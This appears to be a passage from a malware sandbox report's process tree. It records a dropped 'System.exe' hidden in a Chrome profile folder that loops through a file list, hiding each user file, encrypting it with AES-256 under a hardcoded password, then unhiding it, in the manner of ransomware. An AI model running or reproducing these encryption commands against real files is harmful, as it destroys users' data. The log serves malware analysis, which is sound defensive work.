C:\Windows\system32\cmd.exe /c findstr /b "14:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
4⤵
PID:5216

C:\Windows\system32\findstr.exe
findstr /b "14:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
5⤵
PID:4512

C:\Windows\system32\attrib.exe
Attrib +h +s "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ScreenshotOptIn.gif"
4⤵
PID:1448

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exe
System.exe --encrypt --file="C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ScreenshotOptIn.gif" --pass=7962089087181755926211401126974224811160328267 --algo=AES-256
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4924

C:\Windows\system32\attrib.exe
Attrib -h -s "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ScreenshotOptIn.gif"
4⤵
PID:2496

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b "15:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
4⤵
PID:5932

C:\Windows\system32\findstr.exe
findstr /b "15:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
5⤵
PID:3772

C:\Windows\system32\attrib.exe
Attrib +h +s "C:\Users\Admin\Downloads\AddAssert.gif"
4⤵
PID:5476

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exe
System.exe --encrypt --file="C:\Users\Admin\Downloads\AddAssert.gif" --pass=7962089087181755926211401126974224811160328267 --algo=AES-256
4⤵
- Executes dropped EXE
PID:2172

C:\Windows\system32\attrib.exe
Attrib -h -s "C:\Users\Admin\Downloads\AddAssert.gif"
4⤵
PID:5568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b "16:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
4⤵
PID:5976

C:\Windows\system32\findstr.exe
findstr /b "16:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
5⤵
PID:4552

C:\Windows\system32\attrib.exe
Attrib +h +s "C:\Users\Admin\Pictures\ConfirmMeasure.gif"
4⤵
PID:5324

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exe
System.exe --encrypt --file="C:\Users\Admin\Pictures\ConfirmMeasure.gif" --pass=7962089087181755926211401126974224811160328267 --algo=AES-256
4⤵
- Executes dropped EXE
PID:3692

C:\Windows\system32\attrib.exe
Attrib -h -s "C:\Users\Admin\Pictures\ConfirmMeasure.gif"
4⤵
PID:6140

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b "17:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
4⤵
PID:5288

C:\Windows\system32\findstr.exe
findstr /b "17:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
5⤵
PID:3812

C:\Windows\system32\attrib.exe
Attrib +h +s "C:\Users\Admin\Pictures\ImportCompare.gif"
4⤵
PID:392

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exe
System.exe --encrypt --file="C:\Users\Admin\Pictures\ImportCompare.gif" --pass=7962089087181755926211401126974224811160328267 --algo=AES-256
4⤵
- Executes dropped EXE
PID:3472

C:\Windows\system32\attrib.exe
Attrib -h -s "C:\Users\Admin\Pictures\ImportCompare.gif"
4⤵
PID:4884

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b "18:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
4⤵
PID:1660

C:\Windows\system32\findstr.exe
findstr /b "18:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
5⤵
PID:4976

C:\Windows\system32\attrib.exe
Attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt"
4⤵
PID:1164

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exe
System.exe --encrypt --file="C:\Users\Admin\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-256
4⤵
- Executes dropped EXE
PID:4944

C:\Windows\system32\attrib.exe
Attrib -h -s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt"
4⤵
PID:2060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b "19:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
4⤵
PID:3760

C:\Windows\system32\findstr.exe
findstr /b "19:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
5⤵
PID:4424

C:\Windows\system32\attrib.exe
Attrib +h +s "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\brndlog.txt"
4⤵
PID:868

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exe
System.exe --encrypt --file="C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\brndlog.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-256
4⤵
- Executes dropped EXE
PID:5836

C:\Windows\system32\attrib.exe
Attrib -h -s "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\brndlog.txt"
4⤵
PID:3996

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b "20:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
4⤵
PID:3412

C:\Windows\system32\findstr.exe
findstr /b "20:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
5⤵
PID:5304

C:\Windows\system32\attrib.exe
Attrib +h +s "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ThirdPartyNotices.txt"
4⤵
PID:4924

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exe
System.exe --encrypt --file="C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ThirdPartyNotices.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-256
4⤵
- Executes dropped EXE
PID:5356

C:\Windows\system32\attrib.exe
Attrib -h -s "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ThirdPartyNotices.txt"
4⤵
PID:3924

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b "21:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
4⤵
PID:896

C:\Windows\system32\findstr.exe
findstr /b "21:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
5⤵
PID:5004

C:\Windows\system32\attrib.exe
Attrib +h +s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3699a22d-d766-475f-929d-0d1487d41226}\0.0.filtertrie.intermediate.txt"
4⤵
PID:5600

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exe
System.exe --encrypt --file="C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3699a22d-d766-475f-929d-0d1487d41226}\0.0.filtertrie.intermediate.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-256
4⤵
- Executes dropped EXE
PID:2284

C:\Windows\system32\attrib.exe
Attrib -h -s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3699a22d-d766-475f-929d-0d1487d41226}\0.0.filtertrie.intermediate.txt"
4⤵
PID:4252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b "22:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
4⤵
PID:5588

C:\Windows\system32\findstr.exe
findstr /b "22:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
5⤵
PID:5288

C:\Windows\system32\attrib.exe
Attrib +h +s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3699a22d-d766-475f-929d-0d1487d41226}\0.1.filtertrie.intermediate.txt"
4⤵
PID:392

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exe
System.exe --encrypt --file="C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3699a22d-d766-475f-929d-0d1487d41226}\0.1.filtertrie.intermediate.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-256
4⤵
- Executes dropped EXE
PID:5672

C:\Windows\system32\attrib.exe
Attrib -h -s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3699a22d-d766-475f-929d-0d1487d41226}\0.1.filtertrie.intermediate.txt"
4⤵
PID:5852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b "23:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
4⤵
PID:1428

C:\Windows\system32\findstr.exe
findstr /b "23:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
5⤵
PID:3256

C:\Windows\system32\attrib.exe
Attrib +h +s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3699a22d-d766-475f-929d-0d1487d41226}\0.2.filtertrie.intermediate.txt"
4⤵
PID:3392

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exe
System.exe --encrypt --file="C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3699a22d-d766-475f-929d-0d1487d41226}\0.2.filtertrie.intermediate.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-256
4⤵
- Executes dropped EXE
PID:4376

C:\Windows\system32\attrib.exe
Attrib -h -s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3699a22d-d766-475f-929d-0d1487d41226}\0.2.filtertrie.intermediate.txt"
4⤵
PID:5584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b "24:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
4⤵
PID:116

C:\Windows\system32\findstr.exe
findstr /b "24:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
5⤵
PID:3472

C:\Windows\system32\attrib.exe
Attrib +h +s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{77f0c28d-428a-4d18-9971-22926bfdcd25}\0.0.filtertrie.intermediate.txt"
4⤵
PID:5968

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exe
System.exe --encrypt --file="C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{77f0c28d-428a-4d18-9971-22926bfdcd25}\0.0.filtertrie.intermediate.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-256
4⤵
- Executes dropped EXE
PID:2028

C:\Windows\system32\attrib.exe
Attrib -h -s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{77f0c28d-428a-4d18-9971-22926bfdcd25}\0.0.filtertrie.intermediate.txt"
4⤵
PID:4256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b "25:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
4⤵
PID:740

C:\Windows\system32\findstr.exe
findstr /b "25:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
5⤵
PID:3652

C:\Windows\system32\attrib.exe
Attrib +h +s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{77f0c28d-428a-4d18-9971-22926bfdcd25}\0.1.filtertrie.intermediate.txt"
4⤵
PID:5932

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exe
System.exe --encrypt --file="C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{77f0c28d-428a-4d18-9971-22926bfdcd25}\0.1.filtertrie.intermediate.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-256
4⤵
- Executes dropped EXE
PID:3772

C:\Windows\system32\attrib.exe
Attrib -h -s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{77f0c28d-428a-4d18-9971-22926bfdcd25}\0.1.filtertrie.intermediate.txt"
4⤵
PID:2432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b "26:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
4⤵
PID:3472

C:\Windows\system32\findstr.exe
findstr /b "26:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
5⤵
PID:6052

C:\Windows\system32\attrib.exe
Attrib +h +s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{77f0c28d-428a-4d18-9971-22926bfdcd25}\0.2.filtertrie.intermediate.txt"
4⤵
PID:4372

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exe
System.exe --encrypt --file="C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{77f0c28d-428a-4d18-9971-22926bfdcd25}\0.2.filtertrie.intermediate.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-256
4⤵
- Executes dropped EXE
PID:4316

C:\Windows\system32\attrib.exe
Attrib -h -s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{77f0c28d-428a-4d18-9971-22926bfdcd25}\0.2.filtertrie.intermediate.txt"
4⤵
PID:4956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b "27:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
4⤵
PID:5836

C:\Windows\system32\findstr.exe
findstr /b "27:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
5⤵
PID:3996

C:\Windows\system32\attrib.exe
Attrib +h +s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.0.filtertrie.intermediate.txt"
4⤵
PID:1444

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exe
System.exe --encrypt --file="C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.0.filtertrie.intermediate.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-256
4⤵
- Executes dropped EXE
PID:1448

C:\Windows\system32\attrib.exe
Attrib -h -s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.0.filtertrie.intermediate.txt"
4⤵
PID:3116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b "28:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
4⤵
PID:5704

C:\Windows\system32\findstr.exe
findstr /b "28:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
5⤵
PID:1892

C:\Windows\system32\attrib.exe
Attrib +h +s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.1.filtertrie.intermediate.txt"
4⤵
PID:2492

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exe
System.exe --encrypt --file="C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.1.filtertrie.intermediate.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-256
4⤵
- Executes dropped EXE
PID:2660

C:\Windows\system32\attrib.exe
Attrib -h -s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.1.filtertrie.intermediate.txt"
4⤵
PID:2432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b "29:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
4⤵
PID:5004

C:\Windows\system32\findstr.exe
findstr /b "29:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
5⤵
PID:5828

C:\Windows\system32\attrib.exe
Attrib +h +s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.2.filtertrie.intermediate.txt"
4⤵
PID:3312

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exe
System.exe --encrypt --file="C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.2.filtertrie.intermediate.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-256
4⤵
- Executes dropped EXE
PID:448

C:\Windows\system32\attrib.exe
Attrib -h -s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.2.filtertrie.intermediate.txt"
4⤵
- Views/modifies file attributes
PID:6112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b "30:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
4⤵
PID:3656

C:\Windows\system32\findstr.exe
findstr /b "30:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
5⤵
PID:5596

C:\Windows\system32\attrib.exe
Attrib +h +s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.2.filtertrie.intermediate.txt"
4⤵
PID:5224

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exe
System.exe --encrypt --file="C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.2.filtertrie.intermediate.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-256
4⤵
- Executes dropped EXE
PID:4700

C:\Windows\system32\attrib.exe
Attrib -h -s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.2.filtertrie.intermediate.txt"
4⤵
PID:5220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b "31:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
4⤵
PID:4572

C:\Windows\system32\findstr.exe
findstr /b "31:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
5⤵
PID:5308

C:\Windows\system32\attrib.exe
Attrib +h +s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.2.filtertrie.intermediate.txt"
4⤵
PID:3180

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exe
System.exe --encrypt --file="C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.2.filtertrie.intermediate.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-256
4⤵
- Executes dropped EXE
PID:5684

C:\Windows\system32\attrib.exe
Attrib -h -s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.2.filtertrie.intermediate.txt"
4⤵
PID:928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b "32:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
4⤵
PID:5920

C:\Windows\system32\findstr.exe
findstr /b "32:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
5⤵
PID:3652

C:\Windows\system32\attrib.exe
Attrib +h +s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.2.filtertrie.intermediate.txt"
4⤵
PID:5552

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exe
System.exe --encrypt --file="C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.2.filtertrie.intermediate.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-256
4⤵
- Executes dropped EXE
PID:4460

C:\Windows\system32\attrib.exe
Attrib -h -s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.2.filtertrie.intermediate.txt"
4⤵
PID:5704

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b "33:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
4⤵
PID:5828

C:\Windows\system32\findstr.exe
findstr /b "33:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
5⤵
PID:3444

C:\Windows\system32\attrib.exe
Attrib +h +s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.2.filtertrie.intermediate.txt"
4⤵
PID:3812

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exe
System.exe --encrypt --file="C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.2.filtertrie.intermediate.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-256
4⤵
- Executes dropped EXE
PID:4552

C:\Windows\system32\attrib.exe
Attrib -h -s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.2.filtertrie.intermediate.txt"
4⤵
PID:3656

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b "34:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
4⤵
PID:3060

C:\Windows\system32\findstr.exe
findstr /b "34:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
5⤵
PID:1676

C:\Windows\system32\attrib.exe
Attrib +h +s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.2.filtertrie.intermediate.txt"
4⤵
PID:6116

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exe
System.exe --encrypt --file="C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.2.filtertrie.intermediate.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-256
4⤵
- Executes dropped EXE
PID:5584

C:\Windows\system32\attrib.exe
Attrib -h -s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.2.filtertrie.intermediate.txt"
4⤵
PID:4424

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b "35:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
4⤵
PID:2088

C:\Windows\system32\findstr.exe
findstr /b "35:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
5⤵
PID:5392

C:\Windows\system32\attrib.exe
Attrib +h +s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.2.filtertrie.intermediate.txt"
4⤵
PID:3292

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exe
System.exe --encrypt --file="C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.2.filtertrie.intermediate.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-256
4⤵
- Executes dropped EXE
PID:3652

C:\Windows\system32\attrib.exe
Attrib -h -s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{afbd157e-d802-4aa8-932a-26539303defc}\0.2.filtertrie.intermediate.txt"
4⤵
PID:5552

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b "36:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
4⤵
PID:2292

C:\Windows\system32\findstr.exe
findstr /b "36:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
5⤵
PID:5564

C:\Windows\system32\attrib.exe
Attrib +h +s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133596449549740872.txt"
4⤵
PID:2432

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exe
System.exe --encrypt --file="C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133596449549740872.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-256
4⤵
- Executes dropped EXE
PID:5704

C:\Windows\system32\attrib.exe
Attrib -h -s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133596449549740872.txt"
4⤵
PID:4332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b "37:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
4⤵
PID:4580

C:\Windows\system32\findstr.exe
findstr /b "37:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
5⤵
PID:448

C:\Windows\system32\attrib.exe
Attrib +h +s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133596476189409161.txt"
4⤵
PID:5596

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exe
System.exe --encrypt --file="C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133596476189409161.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-256
4⤵
- Executes dropped EXE
PID:5732

C:\Windows\system32\attrib.exe
Attrib -h -s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133596476189409161.txt"
4⤵
PID:1428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b "38:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
4⤵
PID:5580

C:\Windows\system32\findstr.exe
findstr /b "38:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
5⤵
PID:2960

C:\Windows\system32\attrib.exe
Attrib +h +s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133596479198051286.txt"
4⤵
PID:1684

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exe
